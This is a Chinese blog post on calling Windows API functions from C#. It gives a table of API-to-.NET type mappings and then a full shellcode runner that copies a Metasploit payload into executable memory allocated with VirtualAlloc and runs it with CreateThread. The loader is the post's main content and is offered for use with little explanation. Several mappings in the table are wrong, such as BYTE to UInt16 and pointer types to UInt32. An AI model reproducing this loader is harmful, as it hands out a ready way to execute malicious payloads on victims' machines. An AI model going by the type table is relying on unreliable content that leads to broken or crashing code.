c# 調用Windows API

c# 調用Windows API

前言

看點代碼安撫浮躁的心

對應表

API數據類型	Windows API時的數據類型
BOOL	System.Int32
BOOLEAN	System.Int32
BYTE	System.UInt16
COLORREF	System.UInt32
DWORD	System.UInt32
DWORD32	System.UInt32
DWORD64	System.UInt64
FLOAT	System.Float
HACCEL	System.IntPtr
HANDLE	System.IntPtr
HBITMAP	System.IntPtr
HBRUSH	System.IntPtr
HCONV	System.IntPtr
HCONVLIST	System.IntPtr
HCURSOR	System.IntPtr
HDC	System.IntPtr
HDDEDATA	System.IntPtr
HDESK	System.IntPtr
HDROP	System.IntPtr
HDWP	System.IntPtr
HENHMETAFILE	System.IntPtr
HFILE	System.IntPtr
HFONT	System.IntPtr
HGDIOBJ	System.IntPtr
HGLOBAL	System.IntPtr
HHOOK	System.IntPtr
HICON	System.IntPtr
HIMAGELIST	System.IntPtr
HIMC	System.IntPtr
HINSTANCE	System.IntPtr
HKEY	System.IntPtr
HLOCAL	System.IntPtr
HMENU	System.IntPtr
HMETAFILE	System.IntPtr
HMODULE	System.IntPtr
HMONITOR	System.IntPtr
HPALETTE	System.IntPtr
HPEN	System.IntPtr
HRGN	System.IntPtr
HRSRC	System.IntPtr
HSZ	System.IntPtr
HWINSTA	System.IntPtr
HWND	System.IntPtr
INT	System.Int32
INT32	System.Int32
INT64	System.Int64
LONG	System.Int32
LONG32	System.Int32
LONG64	System.Int64
LONGLONG	System.Int64
LPARAM	System.IntPtr
LPBOOL	System.Int16[]
LPBYTE	System.UInt16[]
LPCOLORREF	System.UInt32[]
LPCSTR	System.String
LPCTSTR	System.String
LPCVOID	System.UInt32
LPCWSTR	System.String
LPDWORD	System.UInt32[]
LPHANDLE	System.UInt32
LPINT	System.Int32[]
LPLONG	System.Int32[]
LPSTR	System.String
LPTSTR	System.String
LPVOID	System.UInt32
LPWORD	System.Int32[]
LPWSTR	System.String
LRESULT	System.IntPtr
PBOOL	System.Int16[]
PBOOLEAN	System.Int16[]
PBYTE	System.UInt16[]
PCHAR	System.Char[]
PCSTR	System.String
PCTSTR	System.String
PCWCH	System.UInt32
PCWSTR	System.UInt32
PDWORD	System.Int32[]
PFLOAT	System.Float[]
PHANDLE	System.UInt32
PHKEY	System.UInt32
PINT	System.Int32[]
PLCID	System.UInt32
PLONG	System.Int32[]
PLUID	System.UInt32
PSHORT	System.Int16[]
PSTR	System.String
PTBYTE	System.Char[]
PTCHAR	System.Char[]
PTSTR	System.String
PUCHAR	System.Char[]
PUINT	System.UInt32[]
PULONG	System.UInt32[]
PUSHORT	System.UInt16[]
PVOID	System.UInt32
PWCHAR	System.Char[]
PWORD	System.Int16[]
PWSTR	System.String
REGSAM	System.UInt32
SC_HANDLE	System.IntPtr
SC_LOCK	System.IntPtr
SHORT	System.Int16
SIZE_T	System.UInt32
SSIZE_	System.UInt32
TBYTE	System.Char
TCHAR	System.Char
UCHAR	System.Byte
UINT	System.UInt32
UINT32	System.UInt32
UINT64	System.UInt64
ULONG	System.UInt32
ULONG32	System.UInt32
ULONG64	System.UInt64
ULONGLONG	System.UInt64
USHORT	System.UInt16
WORD	System.UInt16
WPARAM	System.IntPtr
LPTHREAD_START_ROUTINE	UInt32
LPSECURITY_ATTRIBUTES	LPSECURITY_ATTRIBUTES

案例1

[DllImport("kernel32", EntryPoint = "VirtualAlloc")] //導入kernel32.dll，VirtualAlloc函數
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);//聲明win32 API函數

...
//調用
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

//或者可以寫成這樣

  private static UInt32 MEM_COMMIT = 0x1000;
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修飾符用於聲明在外部實現的方法。 extern 修飾符的常見用法是在使用 Interop 服務調入非託管代碼時與 DllImport 特性一起使用。在這種情況下，還必須將方法聲明爲 static

完整代碼

    static void Main(string[] args)
        {
            // native function’s compiled code
            // generated with metasploit
            byte[] shellcode = new byte[892] {  };
           
            
            
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")] 
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
  }

}